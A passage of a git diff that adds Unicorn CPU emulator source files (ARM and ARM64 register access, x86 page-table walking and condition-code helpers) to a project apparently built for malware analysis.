UC_ARM64_REG_SP_EL3) { + ARM_CPU(uc, mycpu)->env.sp_el[regid - UC_ARM64_REG_SP_EL0] = *(uint64_t*)value; + } else if (regid >= UC_ARM64_REG_ESR_EL0 && regid <= UC_ARM64_REG_ESR_EL3) { + ARM_CPU(uc, mycpu)->env.cp15.esr_el[regid - UC_ARM64_REG_ESR_EL0] = *(uint64_t*)value; + } else if (regid >= UC_ARM64_REG_FAR_EL0 && regid <= UC_ARM64_REG_FAR_EL3) { + ARM_CPU(uc, mycpu)->env.cp15.far_el[regid - UC_ARM64_REG_FAR_EL0] = *(uint64_t*)value; + } else if (regid >= UC_ARM64_REG_VBAR_EL0 && regid <= UC_ARM64_REG_VBAR_EL3) { + ARM_CPU(uc, mycpu)->env.cp15.vbar_el[regid - UC_ARM64_REG_VBAR_EL0] = *(uint64_t*)value; + } else { + switch(regid) { + default: break; + case UC_ARM64_REG_CPACR_EL1: + ARM_CPU(uc, mycpu)->env.cp15.c1_coproc = *(uint32_t *)value; + break; + case UC_ARM64_REG_TPIDR_EL0: + ARM_CPU(uc, mycpu)->env.cp15.tpidr_el0 = *(uint64_t *)value; + break; + case UC_ARM64_REG_TPIDRRO_EL0: + ARM_CPU(uc, mycpu)->env.cp15.tpidrro_el0 = *(uint64_t *)value; + break; + case UC_ARM64_REG_TPIDR_EL1: + ARM_CPU(uc, mycpu)->env.cp15.tpidr_el1 = *(uint64_t *)value; + break; + case UC_ARM64_REG_X29: + ARM_CPU(uc, mycpu)->env.xregs[29] = *(uint64_t *)value; + break; + case UC_ARM64_REG_X30: + ARM_CPU(uc, mycpu)->env.xregs[30] = *(uint64_t *)value; + break; + case UC_ARM64_REG_PC: + ARM_CPU(uc, mycpu)->env.pc = *(uint64_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_ARM64_REG_SP: + ARM_CPU(uc, mycpu)->env.xregs[31] = *(uint64_t *)value; + break; + case UC_ARM64_REG_NZCV: + cpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, CPSR_NZCV); + break; + case UC_ARM64_REG_PSTATE: + pstate_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value); + break; + case UC_ARM64_REG_TTBR0_EL1: + ARM_CPU(uc, mycpu)->env.cp15.ttbr0_el1 = *(uint64_t *)value; + break; + case UC_ARM64_REG_TTBR1_EL1: + ARM_CPU(uc, mycpu)->env.cp15.ttbr1_el1 = *(uint64_t *)value; + break; + case UC_ARM64_REG_PAR_EL1: + ARM_CPU(uc, mycpu)->env.cp15.par_el1 = *(uint64_t *)value; + break; + case UC_ARM64_REG_MAIR_EL1: + ARM_CPU(uc, mycpu)->env.cp15.mair_el1 = *(uint64_t *)value; + break; + } + } + } + + return 0; +} + +DEFAULT_VISIBILITY +#ifdef TARGET_WORDS_BIGENDIAN +void arm64eb_uc_init(struct uc_struct* uc) +#else +void arm64_uc_init(struct uc_struct* uc) +#endif +{ + register_accel_types(uc); + arm_cpu_register_types(uc); + aarch64_cpu_register_types(uc); + machvirt_machine_init(uc); + uc->reg_read = arm64_reg_read; + uc->reg_write = arm64_reg_write; + uc->reg_reset = arm64_reg_reset; + uc->set_pc = arm64_set_pc; + uc->release = arm64_release; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_arm.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_arm.c new file mode 100644 index 0000000..d5b9a7d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_arm.c @@ -0,0 +1,243 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/arm/arm.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + +const int ARM_REGS_STORAGE_SIZE = offsetof(CPUARMState, tlb_table); + +static void arm_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUARMState *)uc->current_cpu->env_ptr)->pc = address; + ((CPUARMState *)uc->current_cpu->env_ptr)->regs[15] = address; +} + +void arm_release(void* ctx); + +void arm_release(void* ctx) +{ + ARMCPU* cpu; + struct uc_struct* uc; + TCGContext *s = (TCGContext *) ctx; + + g_free(s->tb_ctx.tbs); + uc = s->uc; + cpu = (ARMCPU*) uc->cpu; + g_free(cpu->cpreg_indexes); + g_free(cpu->cpreg_values); + g_free(cpu->cpreg_vmstate_indexes); + g_free(cpu->cpreg_vmstate_values); + + release_common(ctx); +} + +void arm_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env; + (void)uc; + + env = uc->cpu->env_ptr; + memset(env->regs, 0, sizeof(env->regs)); + + env->pc = 0; +} + +/* these functions are implemented in helper.c. */ +#include "exec/helper-head.h" +uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg); +void HELPER(v7m_msr)(CPUARMState *env, uint32_t reg, uint32_t val); + +int arm_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu; + int i; + + mycpu = uc->cpu; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + if (regid >= UC_ARM_REG_R0 && regid <= UC_ARM_REG_R12) + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.regs[regid - UC_ARM_REG_R0]; + else if (regid >= UC_ARM_REG_D0 && regid <= UC_ARM_REG_D31) + *(float64 *)value = ARM_CPU(uc, mycpu)->env.vfp.regs[regid - UC_ARM_REG_D0]; + else { + switch(regid) { + case UC_ARM_REG_APSR: + *(int32_t *)value = cpsr_read(&ARM_CPU(uc, mycpu)->env) & (CPSR_NZCV | CPSR_Q | CPSR_GE); + break; + case UC_ARM_REG_APSR_NZCV: + *(int32_t *)value = cpsr_read(&ARM_CPU(uc, mycpu)->env) & CPSR_NZCV; + break; + case UC_ARM_REG_CPSR: + *(int32_t *)value = cpsr_read(&ARM_CPU(uc, mycpu)->env); + break; + case UC_ARM_REG_SPSR: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.spsr; + break; + //case UC_ARM_REG_SP: + case UC_ARM_REG_R13: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.regs[13]; + break; + //case UC_ARM_REG_LR: + case UC_ARM_REG_R14: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.regs[14]; + break; + //case UC_ARM_REG_PC: + case UC_ARM_REG_R15: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.regs[15]; + break; + case UC_ARM_REG_C1_C0_2: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.cp15.c1_coproc; + break; + case UC_ARM_REG_C13_C0_3: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.cp15.tpidrro_el0; + break; + case UC_ARM_REG_FPEXC: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.vfp.xregs[ARM_VFP_FPEXC]; + break; + case UC_ARM_REG_IPSR: + *(uint32_t *)value = xpsr_read(&ARM_CPU(uc, mycpu)->env) & 0x1ff; + break; + case UC_ARM_REG_MSP: + *(uint32_t *)value = helper_v7m_mrs(&ARM_CPU(uc, mycpu)->env, 8); + break; + case UC_ARM_REG_PSP: + *(uint32_t *)value = helper_v7m_mrs(&ARM_CPU(uc, mycpu)->env, 9); + break; + case UC_ARM_REG_CONTROL: + *(uint32_t *)value = helper_v7m_mrs(&ARM_CPU(uc, mycpu)->env, 20); + break; + } + } + } + + return 0; +} + +int arm_reg_write(struct uc_struct *uc, unsigned int *regs, void* const* vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_ARM_REG_R0 && regid <= UC_ARM_REG_R12) + ARM_CPU(uc, mycpu)->env.regs[regid - UC_ARM_REG_R0] = *(uint32_t *)value; + else if (regid >= UC_ARM_REG_D0 && regid <= UC_ARM_REG_D31) + ARM_CPU(uc, mycpu)->env.vfp.regs[regid - UC_ARM_REG_D0] = *(float64 *)value; + else { + switch(regid) { + case UC_ARM_REG_APSR: + cpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, (CPSR_NZCV | CPSR_Q | CPSR_GE)); + break; + case UC_ARM_REG_APSR_NZCV: + cpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, CPSR_NZCV); + break; + case UC_ARM_REG_CPSR: + cpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, ~0); + break; + case UC_ARM_REG_SPSR: + ARM_CPU(uc, mycpu)->env.spsr = *(uint32_t *)value; + break; + //case UC_ARM_REG_SP: + case UC_ARM_REG_R13: + ARM_CPU(uc, mycpu)->env.regs[13] = *(uint32_t *)value; + break; + //case UC_ARM_REG_LR: + case UC_ARM_REG_R14: + ARM_CPU(uc, mycpu)->env.regs[14] = *(uint32_t *)value; + break; + //case UC_ARM_REG_PC: + case UC_ARM_REG_R15: + ARM_CPU(uc, mycpu)->env.pc = (*(uint32_t *)value & ~1); + ARM_CPU(uc, mycpu)->env.thumb = (*(uint32_t *)value & 1); + ARM_CPU(uc, mycpu)->env.uc->thumb = (*(uint32_t *)value & 1); + ARM_CPU(uc, mycpu)->env.regs[15] = (*(uint32_t *)value & ~1); + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + + break; + case UC_ARM_REG_C1_C0_2: + ARM_CPU(uc, mycpu)->env.cp15.c1_coproc = *(int32_t *)value; + break; + + case UC_ARM_REG_C13_C0_3: + ARM_CPU(uc, mycpu)->env.cp15.tpidrro_el0 = *(int32_t *)value; + break; + case UC_ARM_REG_FPEXC: + ARM_CPU(uc, mycpu)->env.vfp.xregs[ARM_VFP_FPEXC] = *(int32_t *)value; + break; + case UC_ARM_REG_IPSR: + xpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, 0x1ff); + break; + case UC_ARM_REG_MSP: + helper_v7m_msr(&ARM_CPU(uc, mycpu)->env, 8, *(uint32_t *)value); + break; + case UC_ARM_REG_PSP: + helper_v7m_msr(&ARM_CPU(uc, mycpu)->env, 9, *(uint32_t *)value); + break; + case UC_ARM_REG_CONTROL: + helper_v7m_msr(&ARM_CPU(uc, mycpu)->env, 20, *(uint32_t *)value); + break; + } + } + } + + return 0; +} + +static bool arm_stop_interrupt(int intno) +{ + switch(intno) { + default: + return false; + case EXCP_UDEF: + case EXCP_YIELD: + return true; + } +} + +static uc_err arm_query(struct uc_struct *uc, uc_query_type type, size_t *result) +{ + CPUState *mycpu = uc->cpu; + uint32_t mode; + + switch(type) { + case UC_QUERY_MODE: + // zero out ARM/THUMB mode + mode = uc->mode & ~(UC_MODE_ARM | UC_MODE_THUMB); + // THUMB mode or ARM MOde + mode += ((ARM_CPU(uc, mycpu)->env.thumb != 0)? UC_MODE_THUMB : UC_MODE_ARM); + *result = mode; + return UC_ERR_OK; + default: + return UC_ERR_ARG; + } +} + +#ifdef TARGET_WORDS_BIGENDIAN +void armeb_uc_init(struct uc_struct* uc) +#else +void arm_uc_init(struct uc_struct* uc) +#endif +{ + register_accel_types(uc); + arm_cpu_register_types(uc); + tosa_machine_init(uc); + uc->reg_read = arm_reg_read; + uc->reg_write = arm_reg_write; + uc->reg_reset = arm_reg_reset; + uc->set_pc = arm_set_pc; + uc->stop_interrupt = arm_stop_interrupt; + uc->release = arm_release; + uc->query = arm_query; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/Makefile.objs new file mode 100644 index 0000000..98cb3e3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/Makefile.objs @@ -0,0 +1,5 @@ +obj-y += translate.o helper.o cpu.o +obj-y += excp_helper.o fpu_helper.o cc_helper.o int_helper.o svm_helper.o +obj-y += smm_helper.o misc_helper.o mem_helper.o seg_helper.o +obj-$(CONFIG_SOFTMMU) += arch_memory_mapping.o +obj-y += unicorn.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/TODO b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/TODO new file mode 100644 index 0000000..a8d69cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/TODO @@ -0,0 +1,31 @@ +Correctness issues: + +- some eflags manipulation incorrectly reset the bit 0x2. +- SVM: test, cpu save/restore, SMM save/restore. +- x86_64: lcall/ljmp intel/amd differences ? +- better code fetch (different exception handling + CS.limit support) +- user/kernel PUSHL/POPL in helper.c +- add missing cpuid tests +- return UD exception if LOCK prefix incorrectly used +- test ldt limit < 7 ? +- fix some 16 bit sp push/pop overflow (pusha/popa, lcall lret) +- full support of segment limit/rights +- full x87 exception support +- improve x87 bit exactness (use bochs code ?) +- DRx register support +- CR0.AC emulation +- SSE alignment checks + +Optimizations/Features: + +- add SVM nested paging support +- add VMX support +- add AVX support +- add SSE5 support +- fxsave/fxrstor AMD extensions +- improve monitor/mwait support +- faster EFLAGS update: consider SZAP, C, O can be updated separately + with a bit field in CC_OP and more state variables. +- evaluate x87 stack pointer statically +- find a way to avoid translating several time the same TB if CR0.TS + is set or not. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/arch_memory_mapping.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/arch_memory_mapping.c new file mode 100644 index 0000000..e66ebc9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/arch_memory_mapping.c @@ -0,0 +1,279 @@ +/* + * i386 memory mapping + * + * Copyright Fujitsu, Corp. 2011, 2012 + * + * Authors: + * Wen Congyang + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +#include "cpu.h" +#include "exec/cpu-all.h" +#include "sysemu/memory_mapping.h" + +/* PAE Paging or IA-32e Paging */ +static void walk_pte(MemoryMappingList *list, AddressSpace *as, + hwaddr pte_start_addr, + int32_t a20_mask, target_ulong start_line_addr) +{ + hwaddr pte_addr, start_paddr; + uint64_t pte; + target_ulong start_vaddr; + int i; + + for (i = 0; i < 512; i++) { + pte_addr = (pte_start_addr + i * 8) & a20_mask; + pte = ldq_phys(as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + start_paddr = (pte & ~0xfff) & ~(0x1ULL << 63); + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + + start_vaddr = start_line_addr | ((i & 0x1ff) << 12); + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 12); + } +} + +/* 32-bit Paging */ +static void walk_pte2(MemoryMappingList *list, AddressSpace *as, + hwaddr pte_start_addr, int32_t a20_mask, + target_ulong start_line_addr) +{ + hwaddr pte_addr, start_paddr; + uint32_t pte; + target_ulong start_vaddr; + int i; + + for (i = 0; i < 1024; i++) { + pte_addr = (pte_start_addr + i * 4) & a20_mask; + pte = ldl_phys(as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + start_paddr = pte & ~0xfff; + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + + start_vaddr = start_line_addr | ((i & 0x3ff) << 12); + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 12); + } +} + +/* PAE Paging or IA-32e Paging */ +#define PLM4_ADDR_MASK 0xffffffffff000ULL /* selects bits 51:12 */ + +static void walk_pde(MemoryMappingList *list, AddressSpace *as, + hwaddr pde_start_addr, + int32_t a20_mask, target_ulong start_line_addr) +{ + hwaddr pde_addr, pte_start_addr, start_paddr; + uint64_t pde; + target_ulong line_addr, start_vaddr; + int i; + + for (i = 0; i < 512; i++) { + pde_addr = (pde_start_addr + i * 8) & a20_mask; + pde = ldq_phys(as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = start_line_addr | ((i & 0x1ff) << 21); + if (pde & PG_PSE_MASK) { + /* 2 MB page */ + start_paddr = (pde & ~0x1fffff) & ~(0x1ULL << 63); + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + start_vaddr = line_addr; + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 21); + continue; + } + + pte_start_addr = (pde & PLM4_ADDR_MASK) & a20_mask; + walk_pte(list, as, pte_start_addr, a20_mask, line_addr); + } +} + +/* 32-bit Paging */ +static void walk_pde2(MemoryMappingList *list, AddressSpace *as, + hwaddr pde_start_addr, int32_t a20_mask, + bool pse) +{ + hwaddr pde_addr, pte_start_addr, start_paddr, high_paddr; + uint32_t pde; + target_ulong line_addr, start_vaddr; + int i; + + for (i = 0; i < 1024; i++) { + pde_addr = (pde_start_addr + i * 4) & a20_mask; + pde = ldl_phys(as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = (((unsigned int)i & 0x3ff) << 22); + if ((pde & PG_PSE_MASK) && pse) { + /* + * 4 MB page: + * bits 39:32 are bits 20:13 of the PDE + * bit3 31:22 are bits 31:22 of the PDE + */ + high_paddr = ((hwaddr)(pde & 0x1fe000) << 19); + start_paddr = (pde & ~0x3fffff) | high_paddr; + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + start_vaddr = line_addr; + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 22); + continue; + } + + pte_start_addr = (pde & ~0xfff) & a20_mask; + walk_pte2(list, as, pte_start_addr, a20_mask, line_addr); + } +} + +/* PAE Paging */ +static void walk_pdpe2(MemoryMappingList *list, AddressSpace *as, + hwaddr pdpe_start_addr, int32_t a20_mask) +{ + hwaddr pdpe_addr, pde_start_addr; + uint64_t pdpe; + target_ulong line_addr; + int i; + + for (i = 0; i < 4; i++) { + pdpe_addr = (pdpe_start_addr + i * 8) & a20_mask; + pdpe = ldq_phys(as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = (((unsigned int)i & 0x3) << 30); + pde_start_addr = (pdpe & ~0xfff) & a20_mask; + walk_pde(list, as, pde_start_addr, a20_mask, line_addr); + } +} + +#ifdef TARGET_X86_64 +/* IA-32e Paging */ +static void walk_pdpe(MemoryMappingList *list, AddressSpace *as, + hwaddr pdpe_start_addr, int32_t a20_mask, + target_ulong start_line_addr) +{ + hwaddr pdpe_addr, pde_start_addr, start_paddr; + uint64_t pdpe; + target_ulong line_addr, start_vaddr; + int i; + + for (i = 0; i < 512; i++) { + pdpe_addr = (pdpe_start_addr + i * 8) & a20_mask; + pdpe = ldq_phys(as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = start_line_addr | ((i & 0x1ffULL) << 30); + if (pdpe & PG_PSE_MASK) { + /* 1 GB page */ + start_paddr = (pdpe & ~0x3fffffff) & ~(0x1ULL << 63); + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + start_vaddr = line_addr; + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 30); + continue; + } + + pde_start_addr = (pdpe & PLM4_ADDR_MASK) & a20_mask; + walk_pde(list, as, pde_start_addr, a20_mask, line_addr); + } +} + +/* IA-32e Paging */ +static void walk_pml4e(MemoryMappingList *list, AddressSpace *as, + hwaddr pml4e_start_addr, int32_t a20_mask) +{ + hwaddr pml4e_addr, pdpe_start_addr; + uint64_t pml4e; + target_ulong line_addr; + int i; + + for (i = 0; i < 512; i++) { + pml4e_addr = (pml4e_start_addr + i * 8) & a20_mask; + pml4e = ldq_phys(as, pml4e_addr); + if (!(pml4e & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = ((i & 0x1ffULL) << 39) | (0xffffULL << 48); + pdpe_start_addr = (pml4e & PLM4_ADDR_MASK) & a20_mask; + walk_pdpe(list, as, pdpe_start_addr, a20_mask, line_addr); + } +} +#endif + +void x86_cpu_get_memory_mapping(CPUState *cs, MemoryMappingList *list, + Error **errp) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + if (!cpu_paging_enabled(cs)) { + /* paging is disabled */ + return; + } + + if (env->cr[4] & CR4_PAE_MASK) { +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + hwaddr pml4e_addr; + + pml4e_addr = (env->cr[3] & PLM4_ADDR_MASK) & env->a20_mask; + walk_pml4e(list, cs->as, pml4e_addr, env->a20_mask); + } else +#endif + { + hwaddr pdpe_addr; + + pdpe_addr = (env->cr[3] & ~0x1f) & env->a20_mask; + walk_pdpe2(list, cs->as, pdpe_addr, env->a20_mask); + } + } else { + hwaddr pde_addr; + bool pse; + + pde_addr = (env->cr[3] & ~0xfff) & env->a20_mask; + pse = !!(env->cr[4] & CR4_PSE_MASK); + walk_pde2(list, cs->as, pde_addr, env->a20_mask, pse); + } +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper.c new file mode 100644 index 0000000..29e3c42 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper.c @@ -0,0 +1,389 @@ +/* + * x86 condition code helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +const uint8_t parity_table[256] = { + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, +}; + +#define SHIFT 0 +#include "cc_helper_template.h" +#undef SHIFT + +#define SHIFT 1 +#include "cc_helper_template.h" +#undef SHIFT + +#define SHIFT 2 +#include "cc_helper_template.h" +#undef SHIFT + +#ifdef TARGET_X86_64 + +#define SHIFT 3 +#include "cc_helper_template.h" +#undef SHIFT + +#endif + +static target_ulong compute_all_adcx(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + return (src1 & ~CC_C) | (dst * CC_C); +} + +static target_ulong compute_all_adox(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + return (src1 & ~CC_O) | (src2 * CC_O); +} + +static target_ulong compute_all_adcox(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + return (src1 & ~(CC_C | CC_O)) | (dst * CC_C) | (src2 * CC_O); +} + +target_ulong helper_cc_compute_all(target_ulong dst, target_ulong src1, + target_ulong src2, int op) +{ + switch (op) { + default: /* should never happen */ + return 0; + + case CC_OP_EFLAGS: + return src1; + case CC_OP_CLR: + return CC_Z | CC_P; + + case CC_OP_MULB: + return compute_all_mulb(dst, src1); + case CC_OP_MULW: + return compute_all_mulw(dst, src1); + case CC_OP_MULL: + return compute_all_mull(dst, src1); + + case CC_OP_ADDB: + return compute_all_addb(dst, src1); + case CC_OP_ADDW: + return compute_all_addw(dst, src1); + case CC_OP_ADDL: + return compute_all_addl(dst, src1); + + case CC_OP_ADCB: + return compute_all_adcb(dst, src1, src2); + case CC_OP_ADCW: + return compute_all_adcw(dst, src1, src2); + case CC_OP_ADCL: + return compute_all_adcl(dst, src1, src2); + + case CC_OP_SUBB: + return compute_all_subb(dst, src1); + case CC_OP_SUBW: + return compute_all_subw(dst, src1); + case CC_OP_SUBL: + return compute_all_subl(dst, src1); + + case CC_OP_SBBB: + return compute_all_sbbb(dst, src1, src2); + case CC_OP_SBBW: + return compute_all_sbbw(dst, src1, src2); + case CC_OP_SBBL: + return compute_all_sbbl(dst, src1, src2); + + case CC_OP_LOGICB: + return compute_all_logicb(dst, src1); + case CC_OP_LOGICW: + return compute_all_logicw(dst, src1); + case CC_OP_LOGICL: + return compute_all_logicl(dst, src1); + + case CC_OP_INCB: + return compute_all_incb(dst, src1); + case CC_OP_INCW: + return compute_all_incw(dst, src1); + case CC_OP_INCL: + return compute_all_incl(dst, src1); + + case CC_OP_DECB: + return compute_all_decb(dst, src1); + case CC_OP_DECW: + return compute_all_decw(dst, src1); + case CC_OP_DECL: + return compute_all_decl(dst, src1); + + case CC_OP_SHLB: + return compute_all_shlb(dst, src1); + case CC_OP_SHLW: + return compute_all_shlw(dst, src1); + case CC_OP_SHLL: + return compute_all_shll(dst, src1); + + case CC_OP_SARB: + return compute_all_sarb(dst, src1); + case CC_OP_SARW: + return compute_all_sarw(dst, src1); + case CC_OP_SARL: + return compute_all_sarl(dst, src1); + + case CC_OP_BMILGB: + return compute_all_bmilgb(dst, src1); + case CC_OP_BMILGW: + return compute_all_bmilgw(dst, src1); + case CC_OP_BMILGL: + return compute_all_bmilgl(dst, src1); + + case CC_OP_ADCX: + return compute_all_adcx(dst, src1, src2); + case CC_OP_ADOX: + return compute_all_adox(dst, src1, src2); + case CC_OP_ADCOX: + return compute_all_adcox(dst, src1, src2); + +#ifdef TARGET_X86_64 + case CC_OP_MULQ: + return compute_all_mulq(dst, src1); + case CC_OP_ADDQ: + return compute_all_addq(dst, src1); + case CC_OP_ADCQ: + return compute_all_adcq(dst, src1, src2); + case CC_OP_SUBQ: + return compute_all_subq(dst, src1); + case CC_OP_SBBQ: + return compute_all_sbbq(dst, src1, src2); + case CC_OP_LOGICQ: + return compute_all_logicq(dst, src1); + case CC_OP_INCQ: + return compute_all_incq(dst, src1); + case CC_OP_DECQ: + return compute_all_decq(dst, src1); + case CC_OP_SHLQ: + return compute_all_shlq(dst, src1); + case CC_OP_SARQ: + return compute_all_sarq(dst, src1); + case CC_OP_BMILGQ: + return compute_all_bmilgq(dst, src1); +#endif + } +} + +uint32_t cpu_cc_compute_all(CPUX86State *env, int op) +{ + return (uint32_t)helper_cc_compute_all(CC_DST, CC_SRC, CC_SRC2, op); +} + +target_ulong helper_cc_compute_c(target_ulong dst, target_ulong src1, + target_ulong src2, int op) +{ + switch (op) { + default: /* should never happen */ + case CC_OP_LOGICB: + case CC_OP_LOGICW: + case CC_OP_LOGICL: + case CC_OP_LOGICQ: + case CC_OP_CLR: + return 0; + + case CC_OP_EFLAGS: + case CC_OP_SARB: + case CC_OP_SARW: + case CC_OP_SARL: + case CC_OP_SARQ: + case CC_OP_ADOX: + return src1 & 1; + + case CC_OP_INCB: + case CC_OP_INCW: + case CC_OP_INCL: + case CC_OP_INCQ: + case CC_OP_DECB: + case CC_OP_DECW: + case CC_OP_DECL: + case CC_OP_DECQ: + return src1; + + case CC_OP_MULB: + case CC_OP_MULW: + case CC_OP_MULL: + case CC_OP_MULQ: + return src1 != 0; + + case CC_OP_ADCX: + case CC_OP_ADCOX: + return dst; + + case CC_OP_ADDB: + return compute_c_addb(dst, src1); + case CC_OP_ADDW: + return compute_c_addw(dst, src1); + case CC_OP_ADDL: + return compute_c_addl(dst, src1); + + case CC_OP_ADCB: + return compute_c_adcb(dst, src1, src2); + case CC_OP_ADCW: + return compute_c_adcw(dst, src1, src2); + case CC_OP_ADCL: + return compute_c_adcl(dst, src1, src2); + + case CC_OP_SUBB: + return compute_c_subb(dst, src1); + case CC_OP_SUBW: + return compute_c_subw(dst, src1); + case CC_OP_SUBL: + return compute_c_subl(dst, src1); + + case CC_OP_SBBB: + return compute_c_sbbb(dst, src1, src2); + case CC_OP_SBBW: + return compute_c_sbbw(dst, src1, src2); + case CC_OP_SBBL: + return 